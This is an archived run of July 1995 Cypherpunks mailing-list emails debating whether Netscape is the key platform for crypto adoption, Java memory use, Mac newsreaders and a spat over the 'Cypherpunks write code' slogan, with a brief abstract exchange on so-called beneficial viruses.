From: Ray Cromwell <rjc@clark.net>
Date: Thu, 20 Jul 95 14:01:05 PDT
To: jlasser@rwd.goucher.edu (Jon Lasser)
Subject: Re: Netscape the Big Win
In-Reply-To: <Pine.SUN.3.91.950720161632.12511A-100000@rwd.goucher.edu>
Message-ID: <199507202059.QAA18820@clark.net>
MIME-Version: 1.0
Content-Type: text/plain


Jon Lasser wrote:
> And from what I've heard about HotJava (not seen it yet, can't comment 
> strongly) there needs another jump in PC power before it would be useful 
> at the home level.  Part of why we were stuck with DOS for so long is 
> that it was what got the job done when the revolution happened.  For that 
> reason, I agree that HTML/Integrated browser solutions are what we're 
> looking at, and at the same time don't have strong hopes for HotJava, 
> though I would like to see it succeed.

   HotJava runs fine on a 486/33 with 16mb running WinNT 3.5. 486s are
pretty much standard. 1995 and '96 will be "the year of the pentium."
Entry level systems are now Pentium 90s with PCI and 64-bit video. Pentium
120 systems now cost less than my 486/66 system did a year ago. HotJava
is compiled into efficient byte-code with the option to be translated
to machine code at run time. This is the same principle behind the Newton.
Since the majority of the CPU time is spent in native-C code function
calls to the user interface, and network latency is high, the "slow"
interpreted code is hardly noticed. In fact, I wouldn't call the
Java runtime slow, it beats the performance of many Lisp interpreters
which have been adequate for "home" users. (e.g. Emacs Lisp) HotJava is
not meant for writing applications to decode MPEG in real time. Its best
use is for interactivity on web pages. It doesn't take a powerhouse
of CPU to put up a slider, "sleep" for an event, and then call a ScrollList()
routine. There's going to be a huge use of Java for doing sales catalogs
and online ordering on the web.

> most PC users like "pretty" better.  And they made the best "pretty" 
> software.

  Netscape software is not just a pretty user interface, it also has the
best layout algorithms I've seen of browsers. That's some pretty hefty
dynamic programming there. Mosaic and Arena frequently produce poor
or incorrectly formatted pages. (or less optimal pages than I've seen
Netscape)
-Ray




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Patrick J. LoPresti" <patl@catfish.lcs.mit.edu>
Date: Thu, 20 Jul 95 14:12:29 PDT
To: tcmay@sensemedia.net (Timothy C. May)
Subject: Re: Netscape the Big Win
In-Reply-To: <ac33f977080210043230@[205.199.118.202]>
Message-ID: <199507202112.RAA21906@catfish.lcs.mit.edu>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

>>>>> "tcmay" == Timothy C May <tcmay@sensemedia.net> writes:

 tcmay> Seriously, the world is what the world is. I really don't care
 tcmay> about "FSF" one way or the other, and will join the rest of
 tcmay> the world (apparently) in using Netscape.

I am not ignoring the reality of the situation.  I was not arguing
with your main point, which was that Netscape is going to take over
the world.  We all agree on that, I think.

My point was that your criticism of existing efforts is inappropriate.
I submit that the tools you marginalize are more responsible for
current PGP usage than everything you have ever written combined.  (I
intend no more offense with my comments than you do with yours; I am
just trying to make my point.)

 tcmay> And yes, I am "marginalizing" the work that anyone does on
 tcmay> "fringe" projects like Linux, which will likely always remain
 tcmay> in the ghetto of Unix hackers who want a cheap Unix running on
 tcmay> their cheap 486 boxes...it just ain't gonna take over inside
 tcmay> corporations or amongst the many folks like me.

(Tangential point) I think you underestimate Linux, which has an
installed base of a million or so systems.  But that is a different
topic entirely.

 tcmay> Frankly, one of the great boons of my current setup is that I
 tcmay> can completely get away from Unix tools and commands, away
 tcmay> from my Unix shell account at Netcom, away from the arcane
 tcmay> commands that vary from program to program, away from tin and
 tcmay> elm and emacs...my fingers are already forgetting the emacs
 tcmay> commands!

(Another tangential point, and blatant plug) To verify a PGP signature
from within Emacs, I click on the "Mailcrypt" menu bar item and select
"Verify Signature".  When I lack the public key of the signer,
Mailcrypt offers to fetch it for me from BAL's Web interface.  I
answer "y", and a few seconds later I see the output of PGP on the
public key (so I can check the key signatures).  I confirm that I want
to add the key to my ring, and then the original signature check
completes.

It isn't Netscape, but it isn't rocket science, either.  I agree,
though, that no matter what the interface looks like, it won't be
adopted by the masses if it doesn't run on Windows and Macintosh.

 tcmay> And the newsreader is a matter of taste...it does all I want
 tcmay> it to do, and I'm a fairly heavy reader of News and
 tcmay> contributor to Usenet groups. I survived with "tin" for
 tcmay> several years, so anything is possible.

(Yet another tangential point) If you ever try a news reader with
score files, I think you would be converted.  Especially adaptive
score files.

 tcmay> I don't think the packages I "denigrate" are the key to the
 tcmay> future widespread use of crypto. Look at the actual usage
 tcmay> patterns.

Yes, look at the current usage patterns for PGP.  It's far from being
everyone, but it is even farther from being no one.  Existing
interfaces do make a difference.

 tcmay> Please, your insulting tone ("your musings," "try writing some
 tcmay> code..") is uncalled for. You have your views, I have mine.

Point taken.

You just seemed to be playing the armchair quarterback, telling
developers that they are wasting their time when they are, in fact,
doing everything they can do at present.

Nevertheless, we are, I think, largely on the same team.  I apologize
for my tone.

When it becomes feasible to do what you are asking for Netscape, I am
sure that someone will do it.  At the moment, it is largely out of our
hands, since the Netscape interface is totally controlled by Netscape
Communications...

-----BEGIN PGP SIGNATURE-----
Version: 2.6.2
Comment: Processed by Mailcrypt 3.3beta, an Emacs/PGP interface

iQCVAwUBMA7GqHr7ES8bepftAQEOAwQA0fYoxk1u8lZOUuHRYE+m0ZHpXAQ33mGB
nS4ifVWIW+XLRyVX9Cb3AQbGHottoLt7kYnAmxXuSClCYvwFoC9yTV7aFM7Pe0gj
HHutvRbfd/Cqa8mqW3HnKfDLX9ZYWOX4b9Y5x5tfw6cVpPphHV98Jj18bP72I2vh
+fDUbNlVuEY=
=KeI1
-----END PGP SIGNATURE-----




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: cman@communities.com (Douglas Barnes)
Date: Thu, 20 Jul 95 17:19:01 PDT
To: Phil Fraering        <pgf@tyrell.net>
Subject: Re: Java (was Netscape: the big win)
Message-ID: <v02120d01ac34a93e85dc@[199.2.22.120]>
MIME-Version: 1.0
Content-Type: text/plain


>Does anyone here have any figures on how much memory Java takes up
>when running its typical tasks?
>

These are real ball-park figures based on looking at "free memory"
from vmstat from several instances of launching, running, then exiting
from the listed programs:

Java compiler (written in Java), compiling big program: 2.5 MB

HotJava browser (written in Java), after running some applets: 4.0 MB

"Hello world" Java program (no GUI): 800K







From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Phil Fraering        <pgf@tyrell.net>
Date: Thu, 20 Jul 95 15:42:33 PDT
To: gate@id.WING.NET
Subject: Investigate Your Federal Building :)
In-Reply-To: <Pine.3.89.9507191717.A8562-0100000@dialin1.wing.net>
Message-ID: <199507202226.AA14478@tyrell.net>
MIME-Version: 1.0
Content-Type: text/plain


You know, if you see Mulder or Scully, tell them I said hi.





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Phil Fraering        <pgf@tyrell.net>
Date: Thu, 20 Jul 95 15:37:14 PDT
To: cypherpunks@toad.com
Subject: Java (was Netscape: the big win)
In-Reply-To: <doug-9506201613.AA002518293@netman.eng.auburn.edu>
Message-ID: <199507202231.AA15197@tyrell.net>
MIME-Version: 1.0
Content-Type: text/plain



Does anyone here have any figures on how much memory Java takes up
when running its typical tasks?

Phil




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Phil Fraering        <pgf@tyrell.net>
Date: Thu, 20 Jul 95 15:37:47 PDT
To: cypherpunks@toad.com
Subject: And another thing...
Message-ID: <199507202233.AA15359@tyrell.net>
MIME-Version: 1.0
Content-Type: text/plain



As usual, one final question came to mind right after
sending the last message:

Why is Java the next hot thing instead of Telescript?

Was Telescript ever opened up for general use or was it
mainly used for AT&T's Personalink network?

Phil




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Patrick J. LoPresti" <patl@catfish.lcs.mit.edu>
Date: Thu, 20 Jul 95 14:37:03 PDT
To: tcmay@sensemedia.net (Timothy C. May)
Subject: Re: "Cypherpunks Write Code" as a Putdown
In-Reply-To: <ac3406e80c0210045a87@[205.199.118.202]>
Message-ID: <199507202136.RAA22319@catfish.lcs.mit.edu>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

I have already explained my comments in another thread, but I figure I
should respond to this anyway.

>>>>> "tcmay" == Timothy C May <tcmay@sensemedia.net> writes:

 tcmay> At 5:25 PM 7/20/95, Patrick J. LoPresti wrote:
 >> If it is ever feasible to do what you suggest, someone will do it;
 >> your musings will have no effect on that.  If you want to make a
 >> difference, try writing some code yourself...

 tcmay> In my posting on why I think Netscape and related operating
 tcmay> environments represent the likeliest targets for widespread
 tcmay> crypto use (the "big win" I used in my title), I did not whine
 tcmay> that others ought to write code for me.  I said that this is
 tcmay> where users were going in massive numbers.

That is not all you said; you also suggested that existing interfaces
for "Tin, Pine, Elm, Joe, Emacs, etc." were a waste of time.

 tcmay> Take it or leave it, as an analysis, but the "try writing some
 tcmay> code" is a meaningless insult.

I have apologized for the insulting tone, but I do not feel the
comment was meaningless.  If you are going to criticize my development
efforts, I think it is fair for me to ask, "And what have *you* done?"

The point being, of course, that the criticism itself is unwarranted;
not to make a meaningless insult.

 tcmay> In short, the insulting tone of many Cypherpunks these days is
 tcmay> saddening.

It was a specific response to an insult of my (and others') work.
Again, I apologize.

 tcmay> I plan to continue to speak my mind, to point out what I think
 tcmay> are the more important routes to a desirable future, and to
 tcmay> criticize what I think are dead ends and ghettoized
 tcmay> approaches.

I would hope you would keep the forward-looking vision while ditching
the critical tone.  Those "ghettoized approaches" are the best we have
at present, and they are responsible for the widespread use of PGP,
such as it is.

-----BEGIN PGP SIGNATURE-----
Version: 2.6.2
Comment: Processed by Mailcrypt 3.3beta, an Emacs/PGP interface

iQCVAwUBMA7MWnr7ES8bepftAQHgRQP+O60BcHGWSiUETnePX9DrzDKOBfA7VNPB
900twzEO+o21RVBGMePn3zCc2Z70ejsKmgndH/EN74SWt9Ot03BWyWzIFj67BVua
GhWhuyeBXTBGe3ZzfKFTmNUqKNQocj5UxD6CDj/2O5powYjYLCzKBHZTI3UGyE57
MjBY/YclZRw=
=FPXO
-----END PGP SIGNATURE-----




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Phil Fraering        <pgf@tyrell.net>
Date: Thu, 20 Jul 95 16:01:28 PDT
To: cypherpunks@toad.com
Subject: Netscape the Big Win
In-Reply-To: <ac340c990d021004b0d4@[205.199.118.202]>
Message-ID: <199507202257.AA17742@tyrell.net>
MIME-Version: 1.0
Content-Type: text/plain


Tim May wrote:

   Just to clarify, you mentioned "useful at the home level." I can't speak
   for Ray, but I certainly didn't mean HotJava (or PowerObjects, or OpenDoc,
   or Agents tools, etc.) would be used at "the home level."

   Such tools would likely be used at the programming level.

The tools you mention are either interpreted or gain their
functionality when used at the "home" level.

OLE (gag me with a forklift!) seems to be used more by users to
integrate their own environments together because the programmers
forgot to.

Just speaking as a humble and frustrated Windows 3.1 user.

Phil





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: cman@communities.com (Douglas Barnes)
Date: Thu, 20 Jul 95 18:05:38 PDT
To: stewarts@ix.netcom.com (Bill Stewart)
Subject: Re: Java (was Netscape: the big win)
Message-ID: <v02120d06ac34bad6a82c@[199.2.22.120]>
MIME-Version: 1.0
Content-Type: text/plain


>At 05:18 PM 7/20/95 -0800, Douglas Barnes wrote:
>>Java compiler (written in Java), compiling big program: 2.5 MB
>>HotJava browser (written in Java), after running some applets: 4.0 MB
>
>Believable for this sort of thing.
>
>>"Hello world" Java program (no GUI): 800K
>Yow!  Does this mean I'd have to download an 800K applet to my browser
>just to get it to say "Hello, World"?  Or is this a complete standalone
>program, much larger than a typical applet?

Uh, no, this is a standalone Java program (includes interpreter,
language library, etc.)

Applets are treated by a browser in the same way that a GIF is treated
(more or less); the browser may have to grab more memory to take in
a big one, but that memory can be reclaimed when the user moves on to
a new page.

Applets run as a thread within a multi-threaded browser, they don't
have their own processes, etc.






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: stewarts@ix.netcom.com (Bill Stewart)
Date: Thu, 20 Jul 95 18:14:21 PDT
To: cman@communities.com (Douglas Barnes)
Subject: Re: Java (was Netscape: the big win)
Message-ID: <199507210112.SAA01503@ix7.ix.netcom.com>
MIME-Version: 1.0
Content-Type: text/plain


At 06:04 PM 7/20/95 -0800, Douglas Barnes wrote:
>Uh, no, this is a standalone Java program (includes interpreter,
>language library, etc.)
>
>Applets are treated by a browser in the same way that a GIF is treated
>(more or less); the browser may have to grab more memory to take in
>a big one, but that memory can be reclaimed when the user moves on to
>a new page.
>
>Applets run as a thread within a multi-threaded browser, they don't
>have their own processes, etc.

Good.  Any guesses how big a basic "Hello, World" applet would be?
Maybe 10K?
#                                Thanks;  Bill
# Bill Stewart, Freelance Information Architect, stewarts@ix.netcom.com





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: ab411@detroit.freenet.org (David R. Conrad)
Date: Thu, 20 Jul 95 15:54:40 PDT
To: cypherpunks@toad.com
Subject: Re: Anti-Electronic Racketeering Act of 1995 (fwd)
Message-ID: <199507202254.SAA11508@detroit.freenet.org>
MIME-Version: 1.0
Content-Type: text/plain




Ray Arachelian <sunder@escape.com> writes:
>On Thu, 13 Jul 1995, Bill Stewart wrote:
>>
>> ["virus hackers"]
>>
>>                                              ...  What viruses have to
>> do with encryption is that encryption makes it easier to prevent viruses,
>> and Senator Grassley wants to stop that.
>
>Erm, not quite.  Stealth viruses supposedly use "encryption" to hide 
>themselves....

Perhaps he was referring to the use of (cryptographically strong) hashes
to implement integrity checking?  Or authentication of software
distribution channels?

>Still, you could write beneficial viruses, or virus like programs that 
>are beneficial in nature in some way. KOH for instance?

The problem is, it's awfully hard to come up with a case where a beneficial
virus can't be replaced with a similar program that has the same features,
but lacks the ability to copy itself.

KOH is a good example.  There are plenty of good encryption programs out
there, so what is the advantage to making it a virus?  Precious little.
On the other hand, problems crop up, like: What if there are bugs in it?
How do you "call it back" and replace it with a bugfixed version?  How
does someone know, when it shows up on their machine, that it is still
the original beneficial program, and hasn't been turned into something
malicious?

This is pretty far off the subject for Cypherpunks, though.  (I suppose
it could come with a PGP signature, the key being well-known, and that
would both answer the question of whether it'd been modified as well as
tie this back into cpunks. :)

--
David R. Conrad, ab411@detroit.freenet.org, http://web.grfn.org/~conrad/
Finger conrad@grfn.org for PGP 2.6 public key; it's also on my home page
Key fingerprint =  33 12 BC 77 48 81 99 A5  D8 9C 43 16 3C 37 0B 50
No, his mind is not for rent to any god or government.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: lmccarth@cs.umass.edu (L. McCarthy)
Date: Thu, 20 Jul 95 16:11:21 PDT
To: cypherpunks@toad.com (Cypherpunks Mailing List)
Subject: Re: "Cypherpunks Write Code" as a Putdown
In-Reply-To: <ac3406e80c0210045a87@[205.199.118.202]>
Message-ID: <9507202311.AA12637@cs.umass.edu>
MIME-Version: 1.0
Content-Type: text/plain


Tim May writes:
> Take it or leave it, as an analysis, but the "try writing some code" is a
> meaningless insult.
[more good comments elided]

Agreed. I concur with Tim's further comments, which I've omitted, on the
meaning of "Cypherpunks write code".  It's clear that the qualifications for
being a critic (in the constructive sense) of activity XYZ differ from the
requirements for doing XYZ, in the general case. This is the old "Oh, if
you're so smart, let's see you do it better" from elementary school. Absurd.

One of the primary sources of this dispute is, I think, the fact that c'punks
have widely divergent target markets in mind. I was rather surprised to
observe this at the last Bay Area physical meeting. Sandy moderated a
prognostication session on the future of cryptoanarchy, etc. Towards the end, 
he asked each person to offer his/her definition of "victory" in the
cryptoanarchic program. Some people were adamant that privacy would need to be
widely protected across society for them to consider the project a success.
Others essentially asserted that they'd be content with what I'll call "the
cypherpunk community" enjoying free access to privacy-preserving tools. 

The various *n*x crypto tools go a long way toward satisfying one market, yet
don't appear to help much with another market. So they constitute a "big win"
for some c'punks, while remaining largely irrelevant for others.

It would behoove c'punks on
all sides not to take umbrage at others' embracing different goals. It
would be great to hear persuasive arguments as to why "we" should adopt your
plan, but "we" are under no obligation to be convinced, or to place any
particular value on the achievement of aims we don't share with you.

The significant segregation of software developers and
software users onto different platforms makes the disunity of purpose much
more of an issue than it would be otherwise. A conscious effort must be 
exerted to ensure that tools developed for the cognoscenti ;) have a
chance to run on the machines owned by the rest of the multiverse. For my
money, this is the best feature of platform-independent languages, etc. 
Ideally, Java and such will afford me the opportunity to write code for, say,
the Macintosh, which could compete with native code, without my having to
break down and use a Mac (gag).

On a related note, this summer I've broken down and found myself developing
software in Tcl under VMS. (I'm typing this on a VAXstation 4000 VLC.) Bob
Snyder has recommended exmh here before, a highly MIME- and PGP-aware mailer
for *n*x which is apparently built with Tcl/Tk. Apart from the discussions
of possibly using Safe-Tcl for remailers, I haven't seen much talk of using
Tcl/Tk for crypto apps here. Can anyone point me in the direction of work on
this front, or towards reasons why Tcl/Tk seems like a poor choice ?  I'm
still pretty new to Tcl.

-L. Futplex McCarthy <lmccarth@cs.umass.edu>
"Want to put your secret files where no-one will ever be able to access them ?
 Try ftp://ftp.netcom.com/pub/"



From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: tcmay@sensemedia.net (Timothy C. May)
Date: Thu, 20 Jul 95 19:28:49 PDT
To: cman@communities.com (Douglas Barnes)
Subject: Re: Netscape the Big Win
Message-ID: <ac345ac80e0210040f4f@[205.199.118.202]>
MIME-Version: 1.0
Content-Type: text/plain


At 11:21 PM 7/20/95, Douglas Barnes wrote:

>I don't get what you mean when you say, "Java isn't ready for the
>home market." True, I don't think that programming languages of
>any sort are part of the "home market", but I think that Java will
>enable people like cypherpunks to write extremely portable applications
>_once_ that will be embeddable on web pages viewed by browsers like
>Netscape. I can't think of anything that is going to come closer to
>your definition of "winning" the home market. Certainly the home

I agree. This is what I meant by saying programmers would use it, to put
these capabilities into browsers that home users then get.

Maybe this is just semantic quibbling: all I meant is that Java (or
Fortran, or Perl, or whatever) will not be things the home user is ready
for.

--Tim May


..........................................................................
Timothy C. May         | Crypto Anarchy: encryption, digital money,
tcmay@sensemedia.net   | anonymous networks, digital pseudonyms, zero
408-728-0152           | knowledge, reputations, information markets,
Corralitos, CA         | black markets, collapse of governments.
Higher Power: 2^756839 | Public Key: PGP and MailSafe available.
"National borders are just speed bumps on the information superhighway."






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: cman@communities.com (Douglas Barnes)
Date: Thu, 20 Jul 95 19:57:03 PDT
To: stewarts@ix.netcom.com (Bill Stewart)
Subject: Re: Java (was Netscape: the big win)
Message-ID: <v02120d07ac34d444a1ac@[199.2.22.120]>
MIME-Version: 1.0
Content-Type: text/plain



>Good.  Any guesses how big a basic "Hello, World" applet would be?
>Maybe 10K?

The "Hello World" program I mentioned before is 325 bytes after
compilation. The 800K memory usage was a measurement of the
interpreter and language libraries being sucked into memory, assuming
no other activity on the machine.

I have a much larger program that does various kinds of reformatting
and munging of Java programs that takes up a whopping 8K compiled; its
source file is 13K.

The bytecode compiled programs seem to be much more compact than their
source code versions.






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: shamrock@netcom.com (Lucky Green)
Date: Thu, 20 Jul 95 18:24:10 PDT
To: cypherpunks@toad.com
Subject: Re: Netscape the Big Win
Message-ID: <199507210121.VAA29893@bb.hks.net>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

In article <199507201631.MAA18946@clark.net>, rjc@clark.net (Ray Cromwell)
wrote:


>   The answer is: integration. While TRN is a great newsreader, and 
>Eudora's a great mail reader, etc, if I read a post in TRN or a message
>in Eudora, there is no hyperlinking. If I see a link or reference,

If you used a Mac, all you had to do is click on the URL in your mailer,
newsreader, even some text editors, and the correct helper aplication will
open the URL.

For you Mac users:
ftp://redback.cs.uwa.edu.au//Others/Quinn/Config/ICeTEe1.1.1.sit requires
InternetConfig, which is available at all the major archive sites.

- -- 
- -- Lucky Green <mailto:shamrock@netcom.com>
   PGP encrypted mail preferred.
- ---
[This message has been signed by an auto-signing service.  A valid signature
means only that it has been received at the address corresponding to the
signature and forwarded.]

-----BEGIN PGP SIGNATURE-----
Version: 2.6.2
Comment: Gratis auto-signing service

iQBFAwUBMA8BGioZzwIn1bdtAQGEEQF+PRWtaNDSdRuJYDZfGRGATwFM4zgetK7Q
cLRAa8/r89fJvzz5yRJSZLrbm84B0yYs
=qAXZ
-----END PGP SIGNATURE-----




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: shamrock@netcom.com (Lucky Green)
Date: Thu, 20 Jul 95 18:40:28 PDT
To: cypherpunks@toad.com
Subject: Re: Netscape the Big Win
Message-ID: <199507210138.VAA00100@bb.hks.net>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

In article <ac33dc68060210045e75@[205.199.118.202]>, tcmay@sensemedia.net
(Timothy C. May) wrote:

>The News reader in Netscape 1.1N is as good as the main "separate" news
>reader, NewsWatcher, for the Macintosh, and has some added benefits. For
>example, URLs in News postings automatically show up as clickable items,
>which can be jumped to immediately. (Other News programs _could_ do this,
>and maybe some of them do, but not on the Macintosh, at this moment.)

I won't suggest that others change their favorite programs, but here are
the facts:

- -All URLs in Newswatcher can be accessed by cmd-clicking them.

- -V.A. and Y.A. Newswatcher provides transparent use of anonymous remailers
for both news and email. A feature that most cypherpunks will appreciate
and that Netscape does not provide.
<ftp://mirrors.aol.com//pub/info-mac/comm/tcp/ya-newswatcher-20b28.hqx>

- -In Macs with InternetConfig
<ftp://mirrors.aol.com//pub/info-mac/comm/tcp/internet-config-11.hqx> and
the latest ICeTEe extension
<ftp://redback.cs.uwa.edu.au//Others/Quinn/Config/InternetConfig1.1.sit>
installed, all programs that use TextEdit, such as Eudora and SimpleText,
become browsers that allow instant access to any URL mentioned in the text
just by cmd-clicking on it. Netscape doesn't even come close.

- -- 
- -- Lucky Green <mailto:shamrock@netcom.com>
   PGP encrypted mail preferred.
- ---
[This message has been signed by an auto-signing service.  A valid signature
means only that it has been received at the address corresponding to the
signature and forwarded.]

-----BEGIN PGP SIGNATURE-----
Version: 2.6.2
Comment: Gratis auto-signing service

iQBFAwUBMA8E7ioZzwIn1bdtAQFc8gGA0tBCx3neJNN6q/0JQ9dCALSKQh/+v67z
kaXJOLIcpbNW6VWVI32nJwap+C5sdwPg
=Ms35
-----END PGP SIGNATURE-----




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: shamrock@netcom.com (Lucky Green)
Date: Thu, 20 Jul 95 18:44:36 PDT
To: cypherpunks@toad.com
Subject: Re: Netscape the Big Win
Message-ID: <199507210142.VAA00150@bb.hks.net>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

In article <ac33f977080210043230@[205.199.118.202]>, tcmay@sensemedia.net
(Timothy C. May) wrote:

>Frankly, one of the great boons of my current setup is that I can
>completely get away from Unix tools and commands, away from my Unix shell
>account at Netcom, away from the arcane commands that vary from program to
>program, away from tin and elm and emacs...my fingers are already
>forgetting the emacs commands!
>
>(Those of you like Unix, fine. I agree it is useful for many things, so I'm
>not trying to debate Unix vs. the world. Just giving my perspective, and
>apparently the perspective of the many who are adopting the Web browsers as
>their "operating environments," insulated from the underlying cruft.)

Is this the same T.C. May that used to argue vehemently that if it can't
be displayed on a VT52, it was no good? Did a space alien take over Tim?

- -- 
- -- Lucky Green <mailto:shamrock@netcom.com>
   PGP encrypted mail preferred.
- ---
[This message has been signed by an auto-signing service.  A valid signature
means only that it has been received at the address corresponding to the
signature and forwarded.]

-----BEGIN PGP SIGNATURE-----
Version: 2.6.2
Comment: Gratis auto-signing service

iQBFAwUBMA8F3SoZzwIn1bdtAQHKegF9GZbdSEP4Q5LlQz6KdwapuCMS3v5i693V
GoyxCoWO/iEOR6M5kl7ASgkagzJgVMi8
=n2gM
-----END PGP SIGNATURE-----




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: ethridge@Onramp.NET (Allen B. Ethridge)
Date: Thu, 20 Jul 95 20:42:12 PDT
To: cypherpunks@toad.com
Subject: Re: Netscape the Big Win
Message-ID: <v02130500ac348a3c3e90@[204.176.193.13]>
MIME-Version: 1.0
Content-Type: text/plain


TCMay:
>
>Why is this important?
>
>I believe, quite strongly, that we are headed toward a situation where the
>large majority of Net/Web users are using some variant of Netscape, or
>Mosaic/MacWeb/etc. (but probably Netscape, for various reasons).
>
>Integration of crypto into Netscape is thus the Big Win.
>
>I felt this was the case as far back as last fall, but my recent
>experiences tell me this is more important than ever. Integration of PGP
>and other crypto routines into Tin, Pine, Elm, Joe, Emacs, etc., is just
>not as important.
>
>...
>
>(I'm not saying one has to stand in line for the August IPO of Netscape
>Communications, but the overall market will favor the Web browsers,
>especially Netscape.)
>
>The relevance for Cypherpunks interested in writing code is that, in my
>carefully considered opinion, writing for Netscape and other Web browsers
>is the Big Win. Even over Windows (except Windows browsers, of course).
>
>--Tim May

I only have time to keep up with my mailing lists on the weekend, so these
may have been mentioned, but...

Didn't Netscape get the short end of a major banking alliance recently?
And wasn't Microsoft's network and security software favored by that?

Has anyone here messed about with PDAs/PICs?  The Apple Newton doesn't have
much in the way of communication, but MagicCap based boxes such as Sony's
Magic Link have an awful lot of (as yet unrealized) potential.  I see as much
promise/threat for communications security in the newer PDA/PIC devices as
in Netscape.

But then I also want Netscape to invoke Eudora for mail and Newswatcher for
news, rather than having to use the as yet unstable Netscape tools.


        allen






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: rah@shipwright.com (Robert Hettinga)
Date: Thu, 20 Jul 95 19:54:40 PDT
To: cypherpunks@toad.com
Subject: RE: Netscape the Big Win(dows)
Message-ID: <v02120d00ac34bcc434d6@[199.0.65.105]>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

on Thu, 20 Jul 1995 10:39:49 -0700, tcmay@sensemedia.net (Timothy C. May)
wrote:

>The News reader in Netscape 1.1N is as good as the main "separate" news
>reader, NewsWatcher, for the Macintosh, and has some added benefits. For
>example, URLs in News postings automatically show up as clickable items,
>which can be jumped to immediately. (Other News programs _could_ do this,
>and maybe some of them do, but not on the Macintosh, at this moment.)

Nit: The standard version of Newswatcher does this. Just hold down the
command key and click on the URL. In addition, using the Internet Config
extension allows you to do this in lots of other standard Mac internet apps,
including the Eudora app you're using to read your mail with right now.
Newswatcher, in it's enhanced "value added" versions, does filtering, and
even will do a one-bounce anonymous remail off the remailer of your choice.

>Big programs tend to grow because they can increase market share by adding
>capabilities, by pulling in more customers.

As someone who's developed and marketed apps for the Mac market, feature
creep  usually happens more to differentiate yourself from your competition
than for any other reason. Don't look back 'cause they might be gaining on
you. Frankly, it's more of a death spiral than anything else. You get design
by focus group and feature list. The classic example of this in the Mac
market is M$ Word, which has now became such a cow that I find myself
reccommending WordPerfect (of all things) to my consulting customers. At
least with Excel, there's still nothing much better, until the next
generation, anyway.

>And I'm not going to use half a dozen small programs, each doing slightly
>different things and having different commands, when one will do nicely.

Only when their feature sets overlap, like in word processors and
spreadsheets.  When they're fully differentiated like what happened on the
Mac TCP/IP internet app market, interface fatigue is not much of a problem.

>(I could list other pluses and minuses, a la my outline FAQ, but here's
>just one more important item: cross-compatibility. Namely, with N smaller
>programs in use, of varying versions, incompatibilities and even crashes
>can result all too often ("We have discovered that MailMuncher 2.12 does
>not work with NewsNabber 1.1."). At lest with something like Netscape, a
>certain amound of cross-operability is likely, for various reasons.)

Not as bad as it sounds. Most Mac internetware types are pretty good about
fixing cross-crashes, that is until they get too big to care, which may
happen with Netscape.  In general, Mac stuff doesn't crash nearly as much as
it used to, and not nearly as much as Window$ still does. You get more
crashes in MacTCP apps because Apple botched their initial TCP
implementation. They're fixing that with Open Transport, which I've seen and
which is pretty bulletproof so far. Finally, we're still in the chewing-gum
and-bailing-wire stage with most internet apps, and the MacTCP based apps
are no exception.

>In any case, while I respect the views Pat is expressing, about
>componentware and "small is better" approaches, the market is voting with
>its feet for apps like Netscape, which are becoming the main programs folks
>will use for communication, News reading, and Web surfing.

Tell us about it in 6 months, Tim, when you've grown out of Netscape. You
sound like someone who's totally enamored with their "-works" app. Most
people end up using more specialized apps when they hit the wall with
something which won't get all those "general purposes" taken care of...

>So go ahead and do it! I've been waiting for many years for such things.

Soon. Very soon, Tim. There's talk on the mcip (Macintosh Crytography
Interface Project) list about version 3.0 of MacPGP which should be
completely modular, and should not require a shell-PGP session to work.
Until then, the applescript hacks seem to be holding up, though Mr. 'corn's
tribulations make a brilliant counterexample.  My signature below was done
with them...

>
>To state an obvious non-crypto use of such "modules," why do all major word
>processing and page layout apps have their own "dictionaries"? Why do I
>have to train the dictionaries of Word, Nisus, FrameMaker, MORE, etc.? That
>there have not been "dictionary modules," for many and sundry reasons, is
>telling.

Claris started to do this, but nobody wanted to standardize on their stuff
for obvious reasons (they're owned by Apple)...

>(Before anyone mentions it, one can on the Mac use things like
>"Thunder" instead of the local dictionaries...this is not the same as a
>module usable by all programs, but instead is a user choice to bypass the
>local dictionaries. We could quibble for hours about whether this is in
>fact a universal module or not.

Indeed, though we shouldn't. Because it is.  Anyway, you're talking apples
<heh> and oranges here. A crypto module like we're talking about would
function more as an init, er, sorry, an extension, rather than as a separate
app, though Stuffit makes a good example of something which works pretty
well as both.

Cheers,
Bob Hettinga


-----BEGIN PGP SIGNATURE-----
Version: 2.6.2

iQCVAwUBMA8WFvgyLN8bw6ZVAQE0agP9FVBNe7lPu8dsqd3tNmGAMY7ivIX0eDR4
uHcogdALmk8+p8eN/a4xpfaAu2uuNp9m/FqTbUC466XREyRI7UVqOZ5EXU8UNEDZ
ykkEaqxIWZ42SZpgHgdCaMdLeNWE8Y5T1ekhN1FjmnoU2oNOQpjH1sbqs1TDuuBo
jWaTC4slnxU=
=MnuL
-----END PGP SIGNATURE-----

-----------------
